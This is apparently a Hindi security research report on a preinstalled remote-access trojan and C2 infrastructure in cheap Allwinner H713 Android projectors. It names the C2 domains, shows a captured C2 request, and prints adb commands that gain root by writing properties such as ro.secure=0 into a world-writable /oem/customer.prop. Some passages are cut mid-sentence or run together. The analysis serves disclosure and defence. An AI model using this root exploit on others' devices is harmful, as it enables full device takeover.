
चीनी beamers के c2-network का ब्रेकडाउन - SilentSDK-Analysis
तकनीकी विश्लेषण रिपोर्ट — सुरक्षा अनुसंधान
प्रभावित उपकरण: Nonete जैसे बीमर ब्रांडों के कई एंड्रॉइड प्रोजेक्टर (उदा., मॉडल HY260Pro) (संभवतः Magcubic, Hotack, Huyukang और कई अन्य के भी कई प्रोजेक्टर, क्योंकि ये कंपनियां समान मॉडल वितरित करती हैं और इसका समर्थन करने वाले संकेत हैं)
चिपसेट प्लेटफॉर्म: Allwinner H713 / sun50iw12p1 — संभावित रूप से इस प्लेटफॉर्म के सभी उपकरणों को प्रभावित करता है
विश्लेषण अवधि: 11–17 अप्रैल, 2026
वर्गीकरण: रिमोट एक्सेस ट्रोजन पेलोड के साथ प्री-इंस्टॉल्ड कमांड-एंड-कंट्रोल इंफ्रास्ट्रक्चर
api.pixelpioneerss.com), संवेदनशील डिवाइस आईडी निकालता है, और किसी भी समय रूट विशेषाधिकारों के साथ मनमाना अतिरिक्त दुर्भावनापूर्ण कोड डाउनलोड और निष्पादित कर सकता है (chmod 777)। इसके अतिरिक्त, उपकरणों में खुले रूट बैकडोर हैं।*.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) को नेटवर्क स्तर पर अवरुद्ध किया जाना चाहिए। प्रभावित उपयोगकर्ता केवल ADB के माध्यम से मैन्युअल रूप से दुर्भावनापूर्ण ऐप्स को अक्षम कर सकते हैं, क्योंकि वे सिस्टम में गहराई से एम्बेडेड हैं।इस रिपोर्ट में प्रलेखित मैलवेयर इंफ्रास्ट्रक्चर एंड्रॉइड प्रोजेक्टरों पर प्री-इंस्टॉल्ड है जो वर्तमान में Amazon, eBay और AliExpress पर अंतिम उपभोक्ताओं को बड़ी मात्रा में बेचे जा रहे हैं। प्रभावित उपकरणों में संभवतः कई ब्रांड नाम शामिल हैं (Hotack, Huyukang, Magcubic, Nonete, और अन्य)। एक ही निर्माता के अन्य उपकरणों पर समान C2 इंफ्रास्ट्रक्चर की स्वतंत्र रूप से पुष्टि की गई है (धारा 13 देखें)। पैटर्न BADBOX मामलों से मेल खाता है।
खरीदा गया उपकरण: Amazon लिंक - Nonete Mini Beamer 4K 1080P
| गुण | मान |
|---|---|
| ब्रांड नाम | Nonete HY260Pro (कई कंपनियों द्वारा बेचा गया मॉडल) |
| आंतरिक मॉडल नाम | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32-बिट) |
| ऑपरेटिंग सिस्टम | SpectraOS (Android 11, कर्नेल 5.4.99) |
| वास्तविक बिल्ड फिंगरप्रिंट | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| स्पूफ़्ड बिल्ड फिंगरप्रिंट | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | अनुमेय (कोई प्रवर्तन नहीं) |
| प्लेटफॉर्म हस्ताक्षर कुंजी | सार्वजनिक AOSP परीक्षण कुंजी |
| OEM प्रमाणपत्र | CN=蓝鲨, OU=www.bsh.me, C=CN |
| फर्मवेयर चैनल | HY260Pro_SpectraOS_TPYB |
दायरे पर नोट: Allwinner H713 चिपसेट यूरोपीय बाजार में बदलते ब्रांड नामों के तहत बेचे जाने वाले कई सस्ते एंड्रॉइड प्रोजेक्टरों में बनाया गया है। समान फर्मवेयर बेस (h713_tuna_p3) और समान C2 ऑपरेटर (शेन्ज़ेन आओडिन टेक्नोलॉजी) दृढ़ता से सुझाव देते हैं कि इस OEM के सभी उपकरणों में समान इंफ्रास्ट्रक्चर है।
| कदम | कार्रवाई | परिणाम |
|---|---|---|
| 1 | नेटवर्क ट्रैफिक का Wireshark कैप्चर | store-api.aodintech.com को HTTP ट्रैफिक |
| 2 | gzip-संपीड़ित C2 प्रतिक्रिया का डिकोडिंग | 7 ऐप्स, जिनमें छिपा हुआ "SilentTools" शामिल है |
| 3 | डाउनलोड पथ का AES-CBC डिक्रिप्शन | कुंजी [REDACTED], .bpp फ़ाइल का URL |
| 4 | /oem/customer.prop के माध्यम से रूट एक्सप्लॉइट | प्रॉपर्टी इंजेक्शन के बाद uid=0(root) |
| 5 | /data, /oem, /system का फोरेंसिक डंप | APKs, डेटाबेस, कॉन्फ़िगरेशन |
| 6 | StoreOS DEX का स्थैतिक विश्लेषण | pm install -r -d, बाइट-रिवर्सल सुरक्षा |
| 7 | reverseLen तंत्र का रिवर्स इंजीनियरिंग | एंटी-विश्लेषण सुरक्षा की समझ |
| 8 | बाइट-रिवर्सल सुरक्षा को तोड़ना | डिक्रिप्टेड, विश्लेषण योग्य SilentSDK DEX |
| 9 | SilentSDK स्ट्रिंग्स का XOR डिक्रिप्शन | C2 डोमेन api.pixelpioneerss.com की पुष्टि |
| 10 | तीन स्रोतों में हैश सत्यापन | MD5/SHA-256 पूरी तरह मेल खाते हैं |
| 11 | मैलवेयर डाउनलोड प्रक्रिया का रिवर्स इंजीनियरिंग | सर्वर अभी भी ऑनलाइन हैं |
| 12 | मैलवेयर का रिवर्स इंजीनियरिंग | प्लगइन-आधारित RAT फ्रेमवर्क |
रूट एक्सेस तीन कमजोरियों के संयोजन के माध्यम से प्राप्त किया गया था:
/oem — पार्टीशन FAT के रूप में fmask=0000 के साथ माउंट किया गया है।customer.prop लोड होता है — सिस्टम प्रॉपर्टीज़ को अधिलेखित करता है।```bash
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writableadb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root adb shell id
**प्रभाव:** कोई भी उपयोगकर्ता जिसके पास भौतिक पहुंच है या उसी नेटवर्क पर कोई हमलावर (ADB के माध्यम से, पोर्ट 5555 खुला, कोई प्रमाणीकरण नहीं) पूर्ण रूट एक्सेस प्राप्त करता है।
---
## 4. C2 सर्वर प्रतिक्रिया — मुख्य साक्ष्य
### कैप्चर किया गया HTTP अनुरोध```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
gzip-संपीड़ित प्रतिक्रिया में सात ऐप्स के साथ एक JSON सूची है। उनमें से छह नियमित स्ट्रीमिंग ऐप्स हैं (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere)। सातवाँ SilentTools है:
| App | Package | isShow | isForce | isSilent Install | isSilent Uninstall | launch Type |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv | true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus | true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient | true | false | false | false | 0 |
| Chrome | com.android.chrome | true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom | true | false | false | false | 0 |
| BrowseHere | com.tcl.browser | true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk | false | true | false | true | 1 |